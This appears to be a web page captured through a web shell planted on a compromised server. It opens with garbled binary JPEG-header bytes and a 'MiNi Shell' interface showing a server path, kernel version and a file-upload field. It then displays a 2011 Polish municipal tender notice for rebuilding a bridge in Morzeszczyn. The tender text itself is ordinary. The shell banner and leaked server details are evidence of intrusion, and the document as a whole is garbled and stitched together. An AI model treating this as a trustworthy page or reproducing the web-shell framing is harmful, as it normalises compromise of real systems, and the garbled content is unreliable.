JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110527/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110527/131516-N-2011.html

<p class="kh_header"><b>Morzeszczyn: PRZEBUDOWA MOSTU DROGOWEGO NAD RZ. JANKĄ W CIĄGU DROGI GMINNEJ ŁĄCZĄCEJ MIEJSCOWOŚĆ MORZESZCZYN Z MIEJSCOWOŚCIĄ KRÓLÓW LAS 
 W GMINIE MORZESZCZYN</b><br>
<b>Numer ogłoszenia: 131516 - 2011; data zamieszczenia: 27.05.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Morzeszczyn , ul. 22 Lipca 4, 83-132 Morzeszczyn, woj. pomorskie, tel. 058 5362724 w. 14, faks 058 5362792.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.morzeszczyn.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> PRZEBUDOWA MOSTU DROGOWEGO NAD RZ. JANKĄ W CIĄGU DROGI GMINNEJ ŁĄCZĄCEJ MIEJSCOWOŚĆ MORZESZCZYN Z MIEJSCOWOŚCIĄ KRÓLÓW LAS 
 W GMINIE MORZESZCZYN.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje swym zakresem wykonanie następujących prac :
                        
Prace przygotowawcze :
 - zabezpieczenie i zagospodarowanie placu budowy
 - usunięcie niskiej zieleni, zagrażającej bezpieczeństwu osób pracujących na placu budowy
- wykonanie wykopów pod fundamenty przyczółków
 - zabezpieczenie wykopów przed niepożądaną ingerencją osób trzecich
                  - przygotowanie tymczasowych - poziomych dróg komunikacji, transportu materiałów i pracy dźwigów
                  - przygotowanie tymczasowych miejsc do składowania sprzętu i materiałów budowlanych
                     Prace konstrukcyjne  :
                  - rozbiórka starej nawierzchni na moście
                  - rozbiórka starego ustroju nośnego oraz przyczółków wraz ze skrzydełkami i palami
                  - wykonanie ścianki szczelnej wraz z oczepem stanowiącej podporę dla stalowej konstrukcji ramowej
                  - wykonanie kap chodnikowych
                  - montaż wyposażenia konstrukcji
                  - wykonanie ochrony antykorozyjnej
                  - wykonanie nawierzchni
                  - zasypanie wykopów 
                  - wykonanie zasypek gruntowych o odpowiednich parametrach  z użyciem sprzętu ciężkiego
                    Prace wykończeniowe  :
                  - mocowanie barieroporęczy ochronnych
                  - malowanie, porządkowanie placu budowy
                  - wykonanie umocnień poprzez obrukowanie wlotu i wylotu a także dna narzutem kamiennym
                  - wykonanie umocnień skarp koryta cieku poprzez faszynowanie i obsianie trawą.
                   
                  Obiekt zaprojektowano jako stalowy przepust ramowy, z konstrukcji SuperCor typ SC.-20B, o grubości  
                  blachy  przepustu - 7,00 mm . 
                  Zakres prac obejmuje ponadto wykonanie kładki dla pieszych na czas trwania budowy.
             Obiekt zaprojektowano na klasę obciążeń B - wg. [8] bez pojazdu STANAG 2021 klasy 150.
             Zamawiający nie wymaga zaplanowania i wykonania objazdów na czas trwania budowy.
             Materiały z rozbiórki istniejącego obiektu mostowego podlegające zwrotowi Zamawiającemu składowane                 
             będą w miejscu wskazanym przez   niego w odległości  do 2 km .
                                                       
Szczegółowo przedmiot zamówienia określa dokumentacja techniczno-projektowa  oraz specyfikacja technicznego wykonania i odbioru robót budowlanych stanowiące załączniki do niniejszej specyfikacji istotnych warunków zamówienia. Załączniki te stanowią integralną część specyfikacji.
Zamówienie będzie realizowane zgodnie z harmonogramem rzeczowo - finansowym robót
sporządzonym przez  Wykonawcę i przedłożonym Zamawiającemu w terminie 7 dni po podpisaniu umowy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.22.11.11-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 120.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający  wymaga od  Wykonawcy wniesienia wadium  w wysokości   15.000 PLN
            może być wnoszone według wyboru Wykonawcy w jednej lub kilku następujących formach:
          -   pieniądzu,
          -   poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo -   
              kredytowej z tym , że zobowiązanie kasy jest zawsze zobowiązaniem pieniężnym ,

          -   gwarancjach bankowych, 
          -   gwarancjach ubezpieczeniowych, 
          -   poręczeniach udzielanych przez podmioty, o których mowa w art.6b ust.5 pkt. 2       
              ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju  
              Przedsiębiorczości (Dz.U. z 2007 r. Nr 42, poz. 275)
       -  Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy Gminy  
               Morzeszczyn w  BS w Skórczu o/Pelplin  nr  51 8342 009 2011 5339 2000 0002        przed  
               upływem terminu składania ofert, przy czym za termin wniesienia wadium w formie  przelewu  
               pieniężnego przyjmuje się termin uznania na rachunku zamawiającego.       
     -   Zamawiający zwraca niezwłocznie wadium, jeżeli:
               1)   upłynął termin związania ofertą;
2)	zawarto umowę w sprawie zamówienia publicznego i wniesiono zabezpieczenie należytego    
      wykonania tej umowy;
               3)  zamawiający unieważnił postępowanie o udzielenie zamówienia, a protesty zostały ostatecznie                                 
                    rozstrzygnięte lub upłynął termin do ich wnoszenia.
      -  Zamawiający zwraca niezwłocznie wadium na wniosek wykonawcy:
               1)   który wycofał ofertę przed upływem terminu składania ofert;
               2)   który został wykluczony z postępowania;
               3)   którego oferta została odrzucona.
       -  Zamawiający żąda ponownego wniesienia wadium przez wykonawców, którym zwrócono wadium  
              na podstawie ust. 2 pkt 2 i 3, jeżeli w wyniku ostatecznego rozstrzygnięcia protestu unieważniono  
              czynność wykluczenia wykonawcy lub odrzucenia oferty. Wykonawcy wnoszą wadium w terminie  
              określonym przez zamawiającego.
       -  Jeżeli wadium wniesiono w pieniądzu, zamawiający zwraca je wraz z odsetkami wynikającymi z  
              umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty  
              prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek  
              bankowy wskazany przez wykonawcę.
-	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została      
              wybrana:
1)	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w  
      ofercie;
             2)  nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
             3)  zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących  
                   po stronie wykonawcy
         Zgodnie z wymogami ustawy Pzp oraz instytucji wydających np. poręczenia , gwarancje oryginalny  
         dokument zostanie zwrócony Wykonawcy . W związku z powyższym, oryginalny dokument należy  
         złożyć w ofercie, nie należy  natomiast wpinać go trwale do oferty. Do oferty należy wpiąć kopię,  
         która pozostanie u Zamawiającego .</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający informuje, iż niniejsze zamówienie nie wymaga posiadania koncesji, zezwolenia  
              lub licencji. Zamawiający nie precyzuje w powyższym zakresie żadnych wymagań , których  
              spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny. Ocena spełnienia  
              powyższego warunku zostanie dokonana na podstawie złożonej oferty wg. formuły spełnia -     
              nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna w/w warunek za spełniony, jeżeli Wykonawca wykaże, że posiada wiedzę i  
              doświadczenie, a w szczególności , że  w okresie ostatnich pięciu lat przed upływem terminu  
              składania ofert , a jeżeli  okres prowadzenia działalności jest krótszy - w tym okresie, wykonał  
              min. 2 roboty o podobnej złożoności i charakterze o wartości łącznie z podatkiem VAT, nie  
              mniejszej niż 300.000,00  zł każda (słownie : trzysta  tysięcy złotych 00/100). 
              Ocena spełnienia powyższego warunku zostanie dokonana na podstawie złożonej oferty wg.  
              formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna w/w warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje  
               odpowiednim potencjałem technicznym do wykonania zamówienia. Zamawiający nie  
               precyzuje w powyższym zakresie żadnych wymagań, których spełnienie Wykonawca 
               zobowiązany jest wykazać w sposób szczególny.   Ocena spełnienia powyższego warunku  
               zostanie dokonana na podstawie złożonej oferty wg. formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna w/w warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje
        osobami zdolnymi do wykonania zamówienia, a w szczególności , że :
         -  dysponuje osobą, która będzie uczestniczyć w wykonywaniu zamówienia, posiadająca   
            uprawnienia budowlane do kierowania robotami budowlanymi ( w stopniu wystarczającym  
            do wykonania zamówienia), w specjalności konstrukcyjno - budowlanej
              Ocena spełnienia powyższego warunku zostanie dokonana na podstawie złożonej oferty wg.  
               formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna w/w warunek za spełniony, jeżeli :
        - Wykonawca wykaże, że posiada ubezpieczenia od odpowiedzialności cywilnej w zakresie   
           prowadzonej działalności w wysokości, co najmniej  200.000,00 zł. 
              Ocena spełnienia powyższego warunku zostanie dokonana na podstawie złożonej oferty wg.  
               formuły spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Stosownie do treści § 4 rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2009 r. w  
      sprawie rodzajów dokumentów, jakich może żądać Zamawiający od Wykonawcy oraz form, w   
      jakich te dokumenty mogą być składane, jeżeli Wykonawca ma siedzibę lub miejsce  
      zamieszkania poza terytorium Rzeczypospolitej Polskiej , zamiast dokumentów, o których mowa  
      powyżej w  :
1)	Rozdz. 7 ust. 2 pkt. a SIWZ składa dokument lub dokumenty, wystawione (nie wcześniej niż 6  
      miesięcy przed upływem terminu składania ofert) w kraju, w którym ma siedzibę lub miejsce  
      zamieszkania , potwierdzające odpowiednio , że :

a)	nie otwarto jego likwidacji ani nie ogłoszono upadłości
 
Stosownie do treści § 4 ust. 3 powołanego powyżej rozporządzenia , jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów , których mowa w  Rozd. 7 ust. 2 pkt. a SIWZ zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.

2.  W przypadku złożenia przez Wykonawców dokumentów zawierających dane  w innych walutach  
     niż określono w niniejszej SIWZ , Zamawiający jako kurs przeliczeniowy waluty przyjmie średni  
     kurs NBP z dnia ukazania się ogłoszenia w Biuletynie Zamówień Publicznych. Ten sam kurs   
     Zamawiający przyjmie przy przeliczaniu wszelkich innych danych finansowych.

3.	Dokumenty i oświadczenia opisane w niniejszej SIWZ winny być podpisane przez osoby uprawnione. Pełnomocnictwo, tj. dokument stwierdzający ustanowienie pełnomocnictwa do reprezentowania w postępowaniu o udzielenie zamówienia, albo reprezentowania w postępowaniu o udzielenie zamówienia i zawarcia umowy powinno być dołączone do oferty, o ile sposób  
      reprezentacji nie wynika z innych dokumentów , np. z odpisu z właściwego rejestru lub    
      zaświadczenia o wpisie do ewidencji działalności gospodarczej, załączonych do oferty oraz    
      powinno w zakresie formy odpowiadać przepisom Kodeksu Cywilnego (oryginał lub  
      uwierzytelniony odpis ) .

4.   W przypadku Wykonawców będących osobami fizycznymi zaleca się załączenie do oferty  
      aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>MOŻLIWE ZMIANY W ZAWARTEJ UMOWIE ORAZ WARUNKI WPROWADZENIA TAKIEJ ZMIANY
      Umowa może ulec zmianie w stosunku do złożonej oferty, na niżej wymienionych warunkach :

   1. W stosunku do terminu realizacji umowy :
      a) konieczność zlecenia prac dodatkowych w trybie zgodnym z przepisami umowy
      b) zmiany przepisów powodujących  konieczność innych rozwiązań, niż zakładano w opisie przedmiotu  
          zamówienia lub SIWZ
c) zmiany przepisów powodujących konieczność uzyskania dokumentów, które te przepisy narzucają

2.	 W stosunku do osób :
a) zmiany osób reprezentujących w przypadku zmian organizacyjnych
b) zmiany osób realizujących zadania pod warunkiem, że osoby te będą spełniały wymagania określone  
    w SIWZ

3. Inne :
    a) w przypadku zmiany stawki urzędowej VAT
    b) zmiana harmonogramu rzeczowo- terminowo- finansowego w przypadku przyspieszenia realizacji 
        prac lub jego opóźnienia lub zmiany terminu realizacji umowy w przypadku zmiany będącej  
        następstwem okoliczności leżących po stronie Zamawiającego, w szczególności :
        - nieterminowe przekazanie terenu budowy przez Zamawiającego
        - wstrzymanie robót przez Zamawiającego
        - wykonanie przez Zamawiającego robót budowlanych lub dostaw bez realizacji których Wykonawca 
          nie może w sposób należyty wykonywać przedmiotu umowy, z przekroczeniem terminów  
          wskazanych dla wykonania tych robót lub dostaw w Warunkach Szczególnych umowy.

      c) w każdym przypadku, gdy zmiana jest korzystna dla Zamawiającego ( np. gdy obniży to koszty  
 inwestycji albo skróci czas realizacji )
         d) zmiany nazwy zadania
   
    Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty,
    na  podstawie której dokonano wyboru Wykonawcy, w przypadku wystąpienia co najmniej jednej z 
    okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia :

Zmiana terminu realizacji przedmiotu umowy :
1.  Zmiany spowodowane warunkami atmosferycznymi, geologicznymi, archeologicznymi w  
     szczególności  :
a)	klęski żywiołowe
b)	warunki atmosferyczne uniemożliwiające prowadzenie robót (temperatury poniżej 0o C , silny wiatr, gwałtowne opady deszczu, gradobicia, burze)
c)	niewypały i niewybuchy
d)	wykopaliska archeologiczne
e)	odmienne od przyjętych warunki geologiczne (kurzawka, głazy narzutowe)
f)	odmienne od przyjętych warunki terenowe ( istnienie nie zinwentaryzowanych sieci, instalacji, fundamentów, bunkrów itp.)
    2.  Zmiany będące następstwem okoliczności leżących  po stronie Zamawiającego, w szczególności :
        a)  nieterminowe przekazanie terenu budowy przez Zamawiającego
        b)  wstrzymanie robót przez Zamawiającego
        c)  konieczność usunięcia błędów lub wprowadzenia zmian w dokumentacji projektowej
    3.  Zmiany będące następstwem działania organów administracji, w szczególności :
  a)  przekroczenie określonych przez prawo terminów wydawania decyzji, zezwoleń, uzgodnień 
  b)  odmowa wydania przez organy administracji wymaganych decyzji, zezwoleń, uzgodnień na skutek  
       błędów w dokumentacji projektowej
 4.  Inne przyczyny zewnętrzne powodujące brak możliwości prowadzenia prac w szczególności : 
        a)  brak dojazdu oraz transportu materiałów na plac budowy (remonty, przebudowa dróg)
        b)  protesty mieszkańców
        c)  przerwy w dostawie energii, wody, gazu itp.
        d)  przerwy w produkcji materiałów opisanych w dokumentacji projektowej
     5.  Zamawiający dopuszcza możliwość przedłużenia terminu realizacji umowy, mimo iż opóźnienie w jej   
          wykonaniu będzie następstwem okoliczności, za które odpowiada Wykonawca,  jeżeli : 
        a)  Wykonawca powiadomi Zamawiającego najpóźniej na 10 dni przed upływem terminu wykonania  
              umowy, o niemożliwości jej ukończenia w tym terminie
        b)  Wykonawca zaproponuje nowy termin zakończenia wykonywania umowy
        c)  Wykonawca zaproponuje Zamawiającemu zrekompensowanie powstałego opóźnienia, w tym przez  
             przedłużenie okresu gwarancji  

       W przypadku wystąpienia którejkolwiek z okoliczności wymienionych w pkt. 1) - 4) termin wykonania  
       umowy może ulec odpowiedniemu przedłużeniu  o czas niezbędny do zakończenia wykonywania jej  
       przedmiotu w sposób należyty, nie dłużej jednak niż o okres trwania tych okoliczności.

      Zmiana sposobu spełnienia świadczenia :

     1.  Zmiany technologiczne, w szczególności :
        a)  niedostępność na rynku materiałów lub urządzeń wskazanych w dokumentacji projektowej  
             spowodowana zaprzestaniem produkcji lub wycofaniem z rynku tych materiałów i urządzeń
        b)  pojawienie się na rynku materiałów lub urządzeń nowszej generacji pozwalających na  
             zaoszczędzenie kosztów realizacji przedmiotu umowy lub kosztów eksploatacji wykonanego  
             przedmiotu umowy
        c)  pojawienie się nowszej technologii wykonania zaprojektowanych robót pozwalającej na 
             zaoszczędzenie  czasu realizacji inwestycji lub kosztów wykonywanych prac, jak również kosztów  

             eksploatacji wykonanego przedmiotu umowy
        d)  konieczność zrealizowania projektu przy zastosowaniu innych rozwiązań   
             technicznych/technologicznych lub materiałowych niż wskazane w dokumentacji projektowej, w  
             sytuacji, gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub wadliwym   
             wykonaniem projektu. 
e)	odmienne od przyjętych w dokumentacji projektowej warunki geologiczne skutkujące  
      niemożliwością zrealizowania przedmiotu umowy przy dotychczasowych założeniach    
      technologicznych
f)	odmienne od przyjętych w dokumentacji projektowej warunki terenowe, w szczególności istnienie podziemnych sieci, instalacji, urządzeń , nie zinwentaryzowanych obiektów budowlanych ( bunkry, fundamenty ) skutkujące niemożliwością zrealizowania przedmiotu umowy przy dotychczasowych założeniach technologicznych lub materiałowych
g)	konieczność zrealizowania projektu przy zastosowaniu innych rozwiązań technicznych lub materiałowych ze względu na zmiany obowiązującego prawa

   Zmiany osobowe  :

1.	Zmiany osobowe w szczególności  :
a)	zmiana osób, przy pomocy których Wykonawca realizuje przedmiot umowy na inne legitymujące się co najmniej równoważnymi uprawnieniami, których mowa w ustawie prawo budowlane
